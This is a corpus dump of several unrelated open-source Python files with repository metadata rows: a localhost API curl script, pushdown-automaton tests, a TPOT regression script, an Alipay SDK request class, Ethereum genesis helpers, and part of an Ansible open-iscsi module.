# command, run it via the shell, then print a separator.
commands = [
    """curl 'http://localhost:8000/example/testy/zzz/test?foo=bar' """,
    """curl 'http://localhost:8000/example/save/test?data=\{"boo":"paw"\}' """,
    """curl 'http://localhost:8000/example/save/test?data=\[\["boo","paw"\],\[123,"456"\]\]&format=rows' """,
    """curl -X POST 'http://localhost:8000/example/save/test?format=columns' -d '{"far":["boo","paw"],"zoo":[123,"456"]}' """,
    """curl -X POST 'http://localhost:8000/example/save/test?format=csv' -d 'f1,f2,f3\n1,22,333\n"four",5,66' """,
    """curl 'http://localhost:8000/example/search/test?far=paw' """,
]
for cmd in commands:
    print (cmd)
    os.system(cmd)
    print ("\n")
| 25.84375 | 125 | 0.631197 |
2a35042cd7108ee5e05430c63e66e6fccf2150fe | 7,105 | py | Python | tests/test_dpda.py | eohomegrownapps/automata | bd0ec7abd5662c5f1807937db5fdcc6d707c4f47 | [
"MIT"
] | null | null | null | tests/test_dpda.py | eohomegrownapps/automata | bd0ec7abd5662c5f1807937db5fdcc6d707c4f47 | [
"MIT"
] | null | null | null | tests/test_dpda.py | eohomegrownapps/automata | bd0ec7abd5662c5f1807937db5fdcc6d707c4f47 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
"""Classes and functions for testing the behavior of DPDAs."""
# from unittest.mock import patch
import nose.tools as nose
import automata.base.exceptions as exceptions
import automata.pda.exceptions as pda_exceptions
import tests.test_pda as test_pda
from automata.pda.configuration import PDAConfiguration
from automata.pda.dpda import DPDA
from automata.pda.stack import PDAStack
class TestDPDA(test_pda.TestPDA):
    """A test class for testing deterministic pushdown automata."""
    def test_init_dpda(self):
        """Should copy DPDA if passed into DPDA constructor."""
        new_dpda = DPDA.copy(self.dpda)
        self.assert_is_copy(new_dpda, self.dpda)
    def test_init_dpda_missing_formal_params(self):
        """Should raise an error if formal DPDA parameters are missing."""
        with nose.assert_raises(TypeError):
            # stack_symbols, transitions and initial_stack_symbol omitted
            DPDA(
                states={'q0', 'q1', 'q2'},
                input_symbols={'a', 'b'},
                initial_state='q0',
                final_states={'q0'}
            )
    def test_init_dpda_no_acceptance_mode(self):
        """Should create a new DPDA."""
        new_dpda = DPDA(
            states={'q0'},
            input_symbols={'a', 'b'},
            stack_symbols={'#'},
            transitions={
                'q0': {
                    'a': {'#': ('q0', '')},
                }
            },
            initial_state='q0',
            initial_stack_symbol='#',
            final_states={'q0'}
        )
        # 'both' (final state or empty stack) is the documented default
        nose.assert_equal(new_dpda.acceptance_mode, 'both')
    def test_init_dpda_invalid_acceptance_mode(self):
        """Should raise an error if the DPDA has an invalid acceptance mode."""
        with nose.assert_raises(pda_exceptions.InvalidAcceptanceModeError):
            self.dpda.acceptance_mode = 'foo'
            self.dpda.validate()
    def test_validate_invalid_input_symbol(self):
        """Should raise error if a transition has an invalid input symbol."""
        with nose.assert_raises(exceptions.InvalidSymbolError):
            self.dpda.transitions['q1']['c'] = 'q2'
            self.dpda.validate()
    def test_validate_invalid_stack_symbol(self):
        """Should raise error if a transition has an invalid stack symbol."""
        with nose.assert_raises(exceptions.InvalidSymbolError):
            self.dpda.transitions['q1']['a']['2'] = ('q1', ('1', '1'))
            self.dpda.validate()
    def test_validate_nondeterminism(self):
        """Should raise error if DPDA exhibits nondeterminism."""
        with nose.assert_raises(pda_exceptions.NondeterminismError):
            # adding a lambda-conflicting transition makes the DPDA nondeterministic
            self.dpda.transitions['q2']['b']['0'] = ('q2', '0')
            self.dpda.validate()
    def test_read_input_rejected_nondeterministic_transition(self):
        """Should raise error if DPDA exhibits nondeterminism."""
        with nose.assert_raises(pda_exceptions.NondeterminismError):
            self.dpda.transitions['q2']['b']['0'] = ('q2', '0')
            self.dpda.read_input("abb")
    def test_validate_invalid_initial_state(self):
        """Should raise error if the initial state is invalid."""
        with nose.assert_raises(exceptions.InvalidStateError):
            self.dpda.initial_state = 'q4'
            self.dpda.validate()
    def test_validate_invalid_initial_stack_symbol(self):
        """Should raise error if the initial stack symbol is invalid."""
        with nose.assert_raises(exceptions.InvalidSymbolError):
            self.dpda.initial_stack_symbol = '2'
            self.dpda.validate()
    def test_validate_invalid_final_state(self):
        """Should raise error if the final state is invalid."""
        with nose.assert_raises(exceptions.InvalidStateError):
            self.dpda.final_states = {'q4'}
            self.dpda.validate()
    def test_read_input_valid_accept_by_final_state(self):
        """Should return correct config if DPDA accepts by final state."""
        nose.assert_equal(
            self.dpda.read_input('aabb'),
            PDAConfiguration('q3', '', PDAStack(['0']))
        )
    def test_read_input_invalid_accept_by_final_state(self):
        """Should not accept by final state if DPDA accepts by empty stack."""
        self.dpda.acceptance_mode = 'empty_stack'
        with nose.assert_raises(exceptions.RejectionException):
            self.dpda.read_input('aabb')
    def test_read_input_valid_accept_by_empty_stack(self):
        """Should return correct config if DPDA accepts by empty stack."""
        # extra lambda transition pops the bottom-of-stack marker
        self.dpda.transitions['q2']['']['0'] = ('q2', '')
        self.dpda.acceptance_mode = 'empty_stack'
        nose.assert_equal(
            self.dpda.read_input('aabb'),
            PDAConfiguration('q2', '', PDAStack([]))
        )
    def test_read_input_invalid_accept_by_empty_stack(self):
        """Should not accept by empty stack if DPDA accepts by final state."""
        self.dpda.transitions['q2']['']['0'] = ('q2', '')
        with nose.assert_raises(exceptions.RejectionException):
            self.dpda.read_input('aabb')
    def test_read_input_valid_consecutive_lambda_transitions(self):
        """Should follow consecutive lambda transitions when validating."""
        self.dpda.states = {'q4'}
        self.dpda.final_states = {'q4'}
        self.dpda.transitions['q2']['']['0'] = ('q3', ('0',))
        self.dpda.transitions['q3'] = {
            '': {'0': ('q4', ('0',))}
        }
        nose.assert_equal(
            self.dpda.read_input('aabb'),
            PDAConfiguration('q4', '', PDAStack(['0']))
        )
    def test_read_input_rejected_accept_by_final_state(self):
        """Should reject strings if DPDA accepts by final state."""
        with nose.assert_raises(exceptions.RejectionException):
            self.dpda.read_input('aab')
    def test_read_input_rejected_accept_by_empty_stack(self):
        """Should reject strings if DPDA accepts by empty stack."""
        with nose.assert_raises(exceptions.RejectionException):
            self.dpda.transitions['q2']['']['0'] = ('q2', '')
            self.dpda.read_input('aab')
    def test_read_input_rejected_undefined_transition(self):
        """Should reject strings which lead to an undefined transition."""
        with nose.assert_raises(exceptions.RejectionException):
            self.dpda.read_input('01')
    def test_accepts_input_true(self):
        """Should return True if DPDA input is accepted."""
        nose.assert_equal(self.dpda.accepts_input('aabb'), True)
    def test_accepts_input_false(self):
        """Should return False if DPDA input is rejected."""
        nose.assert_equal(self.dpda.accepts_input('aab'), False)
    def test_empty_dpda(self):
        """Should accept an empty input if the DPDA is empty."""
        dpda = DPDA(
            states={'q0'},
            input_symbols=set(),
            stack_symbols={'0'},
            transitions=dict(),
            initial_state='q0',
            initial_stack_symbol='0',
            final_states={'q0'},
            acceptance_mode='both'
        )
        nose.assert_true(dpda.accepts_input(''))
| 40.141243 | 79 | 0.626319 |
e5905be536947f3a01bb67683c6bc9ec6944c315 | 1,249 | py | Python | Python Scripts/tpot_genetic_spitzer_calibration.py | exowanderer/SpitzerDeepLearningNetwork | 37f3ca1731b05f64ec6080bf9e333c7a491840f8 | [
"MIT"
] | 1 | 2022-03-24T10:25:17.000Z | 2022-03-24T10:25:17.000Z | Python Scripts/tpot_genetic_spitzer_calibration.py | exowanderer/SpitzerDeepLearningNetwork | 37f3ca1731b05f64ec6080bf9e333c7a491840f8 | [
"MIT"
] | null | null | null | Python Scripts/tpot_genetic_spitzer_calibration.py | exowanderer/SpitzerDeepLearningNetwork | 37f3ca1731b05f64ec6080bf9e333c7a491840f8 | [
"MIT"
] | null | null | null | from tpot import TPOTRegressor
# Fit a TPOT (genetic-programming AutoML) regressor to the Spitzer
# calibration data and export the best discovered pipeline as Python code.
import pandas as pd
import numpy as np
import warnings
warnings.filterwarnings("ignore")
# from matplotlib import pyplot as plt
from sklearn.model_selection import train_test_split
# NOTE(review): joblib and r2_score are imported but not used below —
# presumably leftovers from an earlier version of this script.
from sklearn.externals import joblib
from sklearn.metrics import r2_score
from time import time
n_skip = 100 # testing on smaller data set
# Subsample every n_skip-th row of the features and the 'Flux' label column.
features = pd.read_csv('pmap_raw_16features.csv').iloc[::n_skip]
labels = pd.read_csv('pmap_raw_labels_and_errors.csv')['Flux'].iloc[::n_skip]
#Split training, testing, and validation data
idx = np.arange(labels.values.size)
training_indices, validation_indices = train_test_split(idx, test_size=0.20)
#Let Genetic Programming find best ML model and hyperparameters
tpot = TPOTRegressor(generations=10, verbosity=2, n_jobs=-1)
start = time()
tpot.fit(features.iloc[training_indices].values, labels.iloc[training_indices].values)
print('Full TPOT regressor operation took {:.1f} minutes'.format((time() - start)/60))
#Score the accuracy
print('Best pipeline test accuracy: {:.3f}'.format(
    tpot.score(features.iloc[validation_indices].values, labels.iloc[validation_indices].values)))
#Export the generated code
tpot.export('spitzer_calibration_tpot_best_pipeline.py')
| 32.025641 | 96 | 0.783827 |
785a3bca3ce771c9233af5f3ea888fa01bdf5d0a | 3,979 | py | Python | alipay/aop/api/request/KoubeiCateringPosPaymodeDeleteRequest.py | snowxmas/alipay-sdk-python-all | 96870ced60facd96c5bce18d19371720cbda3317 | [
"Apache-2.0"
] | 213 | 2018-08-27T16:49:32.000Z | 2021-12-29T04:34:12.000Z | alipay/aop/api/request/KoubeiCateringPosPaymodeDeleteRequest.py | snowxmas/alipay-sdk-python-all | 96870ced60facd96c5bce18d19371720cbda3317 | [
"Apache-2.0"
] | 29 | 2018-09-29T06:43:00.000Z | 2021-09-02T03:27:32.000Z | alipay/aop/api/request/KoubeiCateringPosPaymodeDeleteRequest.py | snowxmas/alipay-sdk-python-all | 96870ced60facd96c5bce18d19371720cbda3317 | [
"Apache-2.0"
] | 59 | 2018-08-27T16:59:26.000Z | 2022-03-25T10:08:15.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.KoubeiCateringPosPaymodeDeleteModel import KoubeiCateringPosPaymodeDeleteModel
class KoubeiCateringPosPaymodeDeleteRequest(object):
    """Generated Alipay OpenAPI request wrapper for the
    ``koubei.catering.pos.paymode.delete`` gateway method.

    Holds the request payload (``biz_content``/``biz_model``) plus common
    gateway parameters (version, terminal info, callback URLs, etc.) and
    serializes them via :meth:`get_params`.
    """
    def __init__(self, biz_model=None):
        self._biz_model = biz_model
        self._biz_content = None
        self._version = "1.0"
        self._terminal_type = None
        self._terminal_info = None
        self._prod_code = None
        self._notify_url = None
        self._return_url = None
        self._udf_params = None
        self._need_encrypt = False
    @property
    def biz_model(self):
        return self._biz_model
    @biz_model.setter
    def biz_model(self, value):
        self._biz_model = value
    @property
    def biz_content(self):
        return self._biz_content
    @biz_content.setter
    def biz_content(self, value):
        # Accept either a ready model object or a plain dict, which is
        # coerced through the generated model's from_alipay_dict().
        if isinstance(value, KoubeiCateringPosPaymodeDeleteModel):
            self._biz_content = value
        else:
            self._biz_content = KoubeiCateringPosPaymodeDeleteModel.from_alipay_dict(value)
    @property
    def version(self):
        return self._version
    @version.setter
    def version(self, value):
        self._version = value
    @property
    def terminal_type(self):
        return self._terminal_type
    @terminal_type.setter
    def terminal_type(self, value):
        self._terminal_type = value
    @property
    def terminal_info(self):
        return self._terminal_info
    @terminal_info.setter
    def terminal_info(self, value):
        self._terminal_info = value
    @property
    def prod_code(self):
        return self._prod_code
    @prod_code.setter
    def prod_code(self, value):
        self._prod_code = value
    @property
    def notify_url(self):
        return self._notify_url
    @notify_url.setter
    def notify_url(self, value):
        self._notify_url = value
    @property
    def return_url(self):
        return self._return_url
    @return_url.setter
    def return_url(self, value):
        self._return_url = value
    @property
    def udf_params(self):
        return self._udf_params
    @udf_params.setter
    def udf_params(self, value):
        # Non-dict values are silently ignored (generated-SDK convention).
        if not isinstance(value, dict):
            return
        self._udf_params = value
    @property
    def need_encrypt(self):
        return self._need_encrypt
    @need_encrypt.setter
    def need_encrypt(self, value):
        self._need_encrypt = value
    def add_other_text_param(self, key, value):
        # Lazily create the user-defined parameter dict on first use.
        if not self.udf_params:
            self.udf_params = dict()
        self.udf_params[key] = value
    def get_params(self):
        """Assemble the flat parameter dict sent to the gateway.

        JSON payloads are serialized compactly with sorted keys so the
        gateway signature is reproducible.
        """
        params = dict()
        params[P_METHOD] = 'koubei.catering.pos.paymode.delete'
        params[P_VERSION] = self.version
        if self.biz_model:
            params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
        if self.biz_content:
            if hasattr(self.biz_content, 'to_alipay_dict'):
                params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
            else:
                params['biz_content'] = self.biz_content
        if self.terminal_type:
            params['terminal_type'] = self.terminal_type
        if self.terminal_info:
            params['terminal_info'] = self.terminal_info
        if self.prod_code:
            params['prod_code'] = self.prod_code
        if self.notify_url:
            params['notify_url'] = self.notify_url
        if self.return_url:
            params['return_url'] = self.return_url
        if self.udf_params:
            params.update(self.udf_params)
        return params
    def get_multipart_params(self):
        # This API has no file-upload parameters.
        multipart_params = dict()
        return multipart_params
| 27.441379 | 148 | 0.645388 |
987f9a38dc2c0294e13369831944dd780207ccf4 | 6,188 | py | Python | ethereum/genesis_helpers.py | IIIIllllIIIIllllIIIIllllIIIIllllIIIIll/pyethereum | d962694be03686a8e5c1d7459ae272b70a5c9f77 | [
"MIT"
] | 11 | 2017-06-16T13:19:02.000Z | 2021-06-16T02:33:00.000Z | ethereum/genesis_helpers.py | IIIIllllIIIIllllIIIIllllIIIIllllIIIIll/pyethereum | d962694be03686a8e5c1d7459ae272b70a5c9f77 | [
"MIT"
] | 8 | 2017-11-20T15:09:43.000Z | 2018-04-01T09:36:29.000Z | ethereum/genesis_helpers.py | IIIIllllIIIIllllIIIIllllIIIIllllIIIIll/pyethereum | d962694be03686a8e5c1d7459ae272b70a5c9f77 | [
"MIT"
] | 12 | 2017-06-12T15:54:27.000Z | 2018-04-19T03:31:26.000Z | from ethereum.state import State
from ethereum.block import Block, BlockHeader, BLANK_UNCLES_HASH
from ethereum.utils import (
decode_hex,
big_endian_to_int,
encode_hex,
parse_as_bin,
parse_as_int,
normalize_address,
to_string,
)
from ethereum.config import Env
from ethereum.consensus_strategy import get_consensus_strategy
from ethereum.db import OverlayDB, RefcountDB
import rlp
import json
def block_from_genesis_declaration(genesis_data, env):
    """Build the genesis ``Block`` (no transactions, no uncles) from a
    JSON-style genesis declaration dict.

    ``env`` is accepted for signature symmetry with the other helpers but
    is not consulted here.
    """
    # Accept both key spellings for the mixhash; default is 64 zero chars.
    mixhash_hex = genesis_data.get("mixhash", genesis_data.get("mixHash", "0" * 64))
    header = BlockHeader(
        nonce=parse_as_bin(genesis_data["nonce"]),
        difficulty=parse_as_int(genesis_data["difficulty"]),
        mixhash=parse_as_bin(mixhash_hex),
        coinbase=parse_as_bin(genesis_data["coinbase"]),
        bloom=parse_as_int(genesis_data.get("bloom", "0")),
        timestamp=parse_as_int(genesis_data["timestamp"]),
        prevhash=parse_as_bin(genesis_data["parentHash"]),
        extra_data=parse_as_bin(genesis_data["extraData"]),
        gas_used=parse_as_int(genesis_data.get("gasUsed", "0")),
        gas_limit=parse_as_int(genesis_data["gasLimit"]),
    )
    return Block(header, [], [])
def state_from_genesis_declaration(
        genesis_data, env, block=None, allow_empties=False, executing_on_head=False):
    """Build and commit a genesis ``State`` from a declaration dict.

    Applies the ``alloc`` section (balances, code, nonces, storage) to a
    fresh state, runs the consensus strategy's initializer, commits the
    trie, and writes the resulting state root back into ``block.header``.
    Returns the committed ``State``.
    """
    if block:
        assert isinstance(block, Block)
    else:
        block = block_from_genesis_declaration(genesis_data, env)
    state = State(env=env)
    for addr, data in genesis_data["alloc"].items():
        addr = normalize_address(addr)
        assert len(addr) == 20
        # Both 'wei' and 'balance' are accepted; if both are present,
        # 'balance' wins because it is applied last.
        if 'wei' in data:
            state.set_balance(addr, parse_as_int(data['wei']))
        if 'balance' in data:
            state.set_balance(addr, parse_as_int(data['balance']))
        if 'code' in data:
            state.set_code(addr, parse_as_bin(data['code']))
        if 'nonce' in data:
            state.set_nonce(addr, parse_as_int(data['nonce']))
        if 'storage' in data:
            # Storage keys/values are hex strings; converted to ints here.
            for k, v in data['storage'].items():
                state.set_storage_data(
                    addr, big_endian_to_int(
                        parse_as_bin(k)), big_endian_to_int(
                        parse_as_bin(v)))
    get_consensus_strategy(state.config).initialize(state, block)
    if executing_on_head:
        state.executing_on_head = True
    state.commit(allow_empties=allow_empties)
    print('deleting %d' % len(state.deletes))
    # Physically remove nodes the commit marked for deletion.
    rdb = RefcountDB(state.db)
    for delete in state.deletes:
        rdb.delete(delete)
    # The header's state root must reflect the committed trie.
    block.header.state_root = state.trie.root_hash
    state.changed = {}
    state.prev_headers = [block.header]
    return state
def initialize_genesis_keys(state, genesis):
    """Persist the genesis block's bookkeeping keys into the state DB.

    Stores the genesis number/hash/state snapshot/RLP, the block-0 index
    entries, and commits the DB.
    """
    db = state.db
    db.put(b'GENESIS_NUMBER', to_string(genesis.header.number))
    db.put(b'GENESIS_HASH', to_string(genesis.header.hash))
    db.put(b'GENESIS_STATE', json.dumps(state.to_snapshot()))
    db.put(b'GENESIS_RLP', rlp.encode(genesis))
    db.put(b'block:0', genesis.header.hash)
    # NOTE(review): the score value is a str while other values are bytes —
    # presumably the db layer accepts both; confirm before changing.
    db.put(b'score:' + genesis.header.hash, "0")
    db.put(b'state:' + genesis.header.hash, state.trie.root_hash)
    db.put(genesis.header.hash, b'GENESIS')
    db.commit()
def mk_genesis_data(env, **kwargs):
    """Assemble a genesis declaration dict for ``env``.

    Every field not supplied as a keyword falls back to the matching
    ``GENESIS_*`` entry of ``env.config``.  Only the keywords listed in
    ``allowed`` may be passed; anything else trips the assertion.
    """
    assert isinstance(env, Env)
    allowed = {
        'start_alloc',
        'parent_hash',
        'coinbase',
        'difficulty',
        'gas_limit',
        'timestamp',
        'extra_data',
        'mixhash',
        'nonce',
    }
    assert set(kwargs.keys()).issubset(allowed)
    cfg = env.config
    return {
        "parentHash": kwargs.get('parent_hash', encode_hex(cfg['GENESIS_PREVHASH'])),
        "coinbase": kwargs.get('coinbase', encode_hex(cfg['GENESIS_COINBASE'])),
        "difficulty": kwargs.get('difficulty', cfg['GENESIS_DIFFICULTY']),
        "gasLimit": kwargs.get('gas_limit', cfg['GENESIS_GAS_LIMIT']),
        "timestamp": kwargs.get('timestamp', 0),
        "extraData": kwargs.get('extra_data', encode_hex(cfg['GENESIS_EXTRA_DATA'])),
        "mixhash": kwargs.get('mixhash', encode_hex(cfg['GENESIS_MIXHASH'])),
        "nonce": kwargs.get('nonce', encode_hex(cfg['GENESIS_NONCE'])),
        "alloc": kwargs.get('start_alloc', cfg['GENESIS_INITIAL_ALLOC'])
    }
def mk_genesis_block(env, **kwargs):
    """Create the genesis ``Block`` for ``env`` (kwargs as in
    :func:`mk_genesis_data`)."""
    declaration = mk_genesis_data(env, **kwargs)
    genesis_block = block_from_genesis_declaration(declaration, env)
    # Side effect: this commits the genesis state and writes the state
    # root into genesis_block.header.
    state_from_genesis_declaration(declaration, env, block=genesis_block)
    return genesis_block
def mk_basic_state(alloc, header=None, env=None, executing_on_head=False):
    """Build a committed ``State`` from an ``alloc`` dict and an optional
    header dict (number, gas_limit, gas_used, timestamp, difficulty,
    uncles_hash).  A default header is used when none is given.
    """
    env = env or Env()
    state = State(env=env, executing_on_head=executing_on_head)
    if not header:
        # NOTE(review): 'gas_used' is populated here but never read below.
        header = {
            "number": 0, "gas_limit": env.config['BLOCK_GAS_LIMIT'],
            "gas_used": 0, "timestamp": 1467446877, "difficulty": 1,
            "uncles_hash": '0x' + encode_hex(BLANK_UNCLES_HASH)
        }
    h = BlockHeader(number=parse_as_int(header['number']),
                    timestamp=parse_as_int(header['timestamp']),
                    difficulty=parse_as_int(header['difficulty']),
                    gas_limit=parse_as_int(header['gas_limit']),
                    uncles_hash=parse_as_bin(header['uncles_hash']))
    state.prev_headers = [h]
    for addr, data in alloc.items():
        addr = normalize_address(addr)
        assert len(addr) == 20
        if 'wei' in data:
            state.set_balance(addr, parse_as_int(data['wei']))
        if 'balance' in data:
            state.set_balance(addr, parse_as_int(data['balance']))
        if 'code' in data:
            state.set_code(addr, parse_as_bin(data['code']))
        if 'nonce' in data:
            state.set_nonce(addr, parse_as_int(data['nonce']))
        if 'storage' in data:
            # NOTE(review): unlike state_from_genesis_declaration, storage
            # keys/values are passed as raw bytes here (no
            # big_endian_to_int) — confirm this asymmetry is intentional.
            for k, v in data['storage'].items():
                state.set_storage_data(addr, parse_as_bin(k), parse_as_bin(v))
    # NOTE(review): these use the raw header dict values, not the
    # parse_as_int-normalized ones used for ``h`` above.
    state.block_number = header["number"]
    state.gas_limit = header["gas_limit"]
    state.timestamp = header["timestamp"]
    state.block_difficulty = header["difficulty"]
    state.commit()
    return state
| 38.197531 | 92 | 0.643342 |
2e1574dceaa3007d6fb829f6da4cb41833494c46 | 11,893 | py | Python | ansible/modules/system/open_iscsi.py | EnjoyLifeFund/py36pkgs | 0ac677fbbfa7b6d8c527fe2c759ba05117b07fd2 | [
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | null | null | null | ansible/modules/system/open_iscsi.py | EnjoyLifeFund/py36pkgs | 0ac677fbbfa7b6d8c527fe2c759ba05117b07fd2 | [
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | null | null | null | ansible/modules/system/open_iscsi.py | EnjoyLifeFund/py36pkgs | 0ac677fbbfa7b6d8c527fe2c759ba05117b07fd2 | [
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | 1 | 2020-02-13T14:24:57.000Z | 2020-02-13T14:24:57.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, Serge van Ginderachter <serge@vanginderachter.be>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: open_iscsi
author: "Serge van Ginderachter (@srvg)"
version_added: "1.4"
short_description: Manage iscsi targets with open-iscsi
description:
- Discover targets on given portal, (dis)connect targets, mark targets to
manually or auto start, return device nodes of connected targets.
requirements:
- open_iscsi library and tools (iscsiadm)
options:
portal:
required: false
aliases: [ip]
description:
- the ip address of the iscsi target
port:
required: false
default: 3260
description:
- the port on which the iscsi target process listens
target:
required: false
aliases: [name, targetname]
description:
- the iscsi target name
login:
required: false
choices: [true, false]
description:
- whether the target node should be connected
node_auth:
required: false
default: CHAP
description:
- discovery.sendtargets.auth.authmethod
node_user:
required: false
description:
- discovery.sendtargets.auth.username
node_pass:
required: false
description:
- discovery.sendtargets.auth.password
auto_node_startup:
aliases: [automatic]
required: false
choices: [true, false]
description:
- whether the target node should be automatically connected at startup
discover:
required: false
choices: [true, false]
description:
- whether the list of target nodes on the portal should be
(re)discovered and added to the persistent iscsi database.
      Keep in mind that iscsiadm discovery resets configuration, like node.startup
to manual, hence combined with auto_node_startup=yes will always return
a changed state.
show_nodes:
required: false
choices: [true, false]
description:
- whether the list of nodes in the persistent iscsi database should be
returned by the module
'''
EXAMPLES = '''
# perform a discovery on 10.1.2.3 and show available target nodes
- open_iscsi:
show_nodes: yes
discover: yes
portal: 10.1.2.3
# discover targets on portal and login to the one available
# (only works if exactly one target is exported to the initiator)
- open_iscsi:
portal: '{{ iscsi_target }}'
login: yes
discover: yes
# description: connect to the named target, after updating the local
# persistent database (cache)
- open_iscsi:
login: yes
target: 'iqn.1986-03.com.sun:02:f8c1f9e0-c3ec-ec84-c9c9-8bfb0cd5de3d'
# description: disconnect from the cached named target
- open_iscsi:
login: no
target: 'iqn.1986-03.com.sun:02:f8c1f9e0-c3ec-ec84-c9c9-8bfb0cd5de3d'
'''
import glob
import time
ISCSIADM = 'iscsiadm'
def compare_nodelists(l1, l2):
    """Return True if the two node lists contain the same entries.

    The comparison ignores ordering.  Unlike the previous implementation,
    which called ``list.sort()`` on both arguments, this does not mutate
    the callers' lists.
    """
    return sorted(l1) == sorted(l2)
def iscsi_get_cached_nodes(module, portal=None):
    """Return the target names from the persistent iscsi node database,
    optionally filtered to the given portal IP.
    """
    cmd = '%s --mode node' % iscsiadm_cmd
    (rc, out, err) = module.run_command(cmd)
    if rc == 0:
        lines = out.splitlines()
        nodes = []
        for line in lines:
            # line format is "ip:port,target_portal_group_tag targetname"
            # NOTE(review): a line with fewer than 2 fields would raise
            # IndexError at parts[1] below — presumably iscsiadm always
            # emits two fields per record.
            parts = line.split()
            if len(parts) > 2:
                module.fail_json(msg='error parsing output', cmd=cmd)
            target = parts[1]
            parts = parts[0].split(':')
            target_portal = parts[0]
            if portal is None or portal == target_portal:
                nodes.append(target)
    # older versions of scsiadm don't have nice return codes
    # for newer versions see iscsiadm(8); also usr/iscsiadm.c for details
    # err can contain [N|n]o records...
    elif rc == 21 or (rc == 255 and "o records found" in err):
        nodes = []
    else:
        module.fail_json(cmd=cmd, rc=rc, msg=err)
    return nodes
def iscsi_discover(module, portal, port):
    """Run iscsiadm sendtargets discovery against ``portal:port``,
    refreshing the persistent node database."""
    discovery_cmd = '%s --mode discovery --type sendtargets --portal %s:%s' % (
        iscsiadm_cmd, portal, port)
    returncode, _, stderr = module.run_command(discovery_cmd)
    if returncode > 0:
        module.fail_json(cmd=discovery_cmd, rc=returncode, msg=stderr)
def target_loggedon(module, target):
    """Return True if an active iscsi session exists for ``target``."""
    session_cmd = '%s --mode session' % iscsiadm_cmd
    returncode, stdout, stderr = module.run_command(session_cmd)
    # Exit code 21 means "no active sessions at all".
    if returncode == 21:
        return False
    if returncode != 0:
        module.fail_json(cmd=session_cmd, rc=returncode, msg=stderr)
    return target in stdout
def target_login(module, target):
    """Log in to ``target``, first persisting CHAP credentials (if any)
    into the node record."""
    auth_method = module.params['node_auth']
    auth_user = module.params['node_user']
    auth_pass = module.params['node_pass']
    if auth_user:
        # Write the session auth settings before attempting the login.
        for name, value in (('node.session.auth.authmethod', auth_method),
                            ('node.session.auth.username', auth_user),
                            ('node.session.auth.password', auth_pass)):
            update_cmd = ('%s --mode node --targetname %s --op=update '
                          '--name %s --value %s' % (iscsiadm_cmd, target, name, value))
            returncode, _, stderr = module.run_command(update_cmd)
            if returncode > 0:
                module.fail_json(cmd=update_cmd, rc=returncode, msg=stderr)
    login_cmd = '%s --mode node --targetname %s --login' % (iscsiadm_cmd, target)
    returncode, _, stderr = module.run_command(login_cmd)
    if returncode > 0:
        module.fail_json(cmd=login_cmd, rc=returncode, msg=stderr)
def target_logout(module, target):
    """Close the active iscsi session for ``target``."""
    logout_cmd = '%s --mode node --targetname %s --logout' % (iscsiadm_cmd, target)
    returncode, _, stderr = module.run_command(logout_cmd)
    if returncode > 0:
        module.fail_json(cmd=logout_cmd, rc=returncode, msg=stderr)
def target_device_node(module, target):
    """Return the whole-disk device nodes created for ``target``.

    Resolves the /dev/disk/by-path symlinks, skips partition links, and
    de-duplicates the result (multipath setups can expose the same disk
    through several links).
    """
    disks = []
    for link in glob.glob('/dev/disk/by-path/*%s*' % target):
        # Partition links contain "-part"; only whole disks are wanted.
        if "-part" in link:
            continue
        real_dev = os.path.realpath(link)
        if real_dev not in disks:
            disks.append(real_dev)
    return disks
def target_isauto(module, target):
    """Return True if the cached node record for ``target`` has
    node.startup set to automatic."""
    node_cmd = '%s --mode node --targetname %s' % (iscsiadm_cmd, target)
    returncode, stdout, stderr = module.run_command(node_cmd)
    if returncode != 0:
        module.fail_json(cmd=node_cmd, rc=returncode, msg=stderr)
    for record_line in stdout.splitlines():
        if 'node.startup' in record_line:
            return 'automatic' in record_line
    return False
def target_setauto(module, target):
    """Mark the cached node for ``target`` to connect automatically at
    startup."""
    update_cmd = ('%s --mode node --targetname %s --op=update '
                  '--name node.startup --value automatic' % (iscsiadm_cmd, target))
    returncode, _, stderr = module.run_command(update_cmd)
    if returncode > 0:
        module.fail_json(cmd=update_cmd, rc=returncode, msg=stderr)
def target_setmanual(module, target):
    """Mark the cached node for ``target`` as manual-start only."""
    update_cmd = ('%s --mode node --targetname %s --op=update '
                  '--name node.startup --value manual' % (iscsiadm_cmd, target))
    returncode, _, stderr = module.run_command(update_cmd)
    if returncode > 0:
        module.fail_json(cmd=update_cmd, rc=returncode, msg=stderr)
def main():
    """Ansible module entry point: discovery, (dis)connect and startup-mode
    management for open-iscsi targets, with check-mode support."""
    # load ansible module object
    module = AnsibleModule(
        argument_spec = dict(
            # target
            portal = dict(required=False, aliases=['ip']),
            port = dict(required=False, default=3260),
            target = dict(required=False, aliases=['name', 'targetname']),
            node_auth = dict(required=False, default='CHAP'),
            node_user = dict(required=False),
            node_pass = dict(required=False, no_log=True),
            # actions
            login = dict(type='bool', aliases=['state']),
            auto_node_startup = dict(type='bool', aliases=['automatic']),
            discover = dict(type='bool', default=False),
            show_nodes = dict(type='bool', default=False)
        ),
        # NOTE(review): 'discover_user'/'discover_pass' are not declared in
        # argument_spec above, so that required_together pair is dead —
        # presumably a leftover from a removed feature.
        required_together=[['discover_user', 'discover_pass'],
                           ['node_user', 'node_pass']],
        supports_check_mode=True
    )
    # Resolve the iscsiadm binary once and share it with all helpers.
